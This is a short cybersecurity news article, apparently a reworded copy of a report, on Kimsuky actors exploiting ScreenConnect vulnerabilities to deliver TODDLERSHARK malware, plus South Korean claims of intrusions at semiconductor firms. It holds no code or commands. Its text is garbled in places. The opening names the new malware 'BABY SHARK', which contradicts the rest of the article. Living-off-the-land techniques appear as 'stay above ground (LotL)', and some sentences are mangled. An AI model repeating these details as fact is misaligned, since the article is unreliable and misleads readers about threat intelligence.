North Korean threat actors exploited recently revealed security flaws in ConnectWise ScreenConnect to distribute new malware called BABY SHARK.
According to a report shared by Kroll with The Hacker News, TODDLERSHARK overlaps with well-known Kimsuky malware such as BabyShark and ReconShark.
“The threat actor gained access to the victim’s workstation by exploiting the ScreenConnect application setup wizard,” said security researchers Keith Wojcieszek, George Glass and Dave Truman.
“They then exploited their ‘hands on keyboard’ access to use cmd.exe to execute mshta.exe with a URL to the Visual Basic (VB)-based malware.”
The ConnectWise flaws in question are CVE-2024-1708 and CVE-2024-1709, which came to light last month and have since been heavily exploited by numerous threat actors to provide cryptocurrency miners, ransomware, remote access Trojans and malware stealers.
Kimsuky, also known as APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (formerly Thallium), KTA082, Nickel Kimball, and Velvet Chollima, has steadily expanded its malware arsenal to include new tools, the most recent of which are GoBear and Troll Stealers.
BabyShark, first discovered in late 2018, launches using an HTML Application (HTA) file. Once launched, VB script malware exfiltrates system information on a command and control (C2) server, maintains persistence on the system, and awaits further instructions from the operator.
Then, in May 2023, a variant of BabyShark called ReconShark was observed delivered to specifically targeted individuals via spear-phishing emails. TODDLERSHARK is considered the latest evolution of the same malware due to similarities in code and behavior.
The malware, in addition to using a scheduled task for persistence, is designed to acquire and exfiltrate sensitive information about compromised hosts, thus serving as a valuable reconnaissance tool.
TODDLERSHARK “exhibits elements of polymorphic behavior in the form of changing identity strings in code, changing code location via generated junk code, and using uniquely generated C2 URLs, which could make this malware difficult to detect in some environments,” the researchers said.
The development comes as South Korea’s National Intelligence Service (NIS) accused its Northern counterpart of allegedly compromising the servers of two domestic (and unnamed) semiconductor manufacturers and stealing valuable data.
The digital intrusions took place in December 2023 and February 2024. The threat actors are said to have targeted vulnerable, internet-exposed servers to gain initial access, subsequently leveraging stay above ground (LotL) techniques rather than releasing malware to better evade detection.
“North Korea may have begun preparations for its own semiconductor production due to difficulties in sourcing semiconductors due to sanctions against North Korea and increased demand due to the development of weapons such as satellite missiles” , NIS said.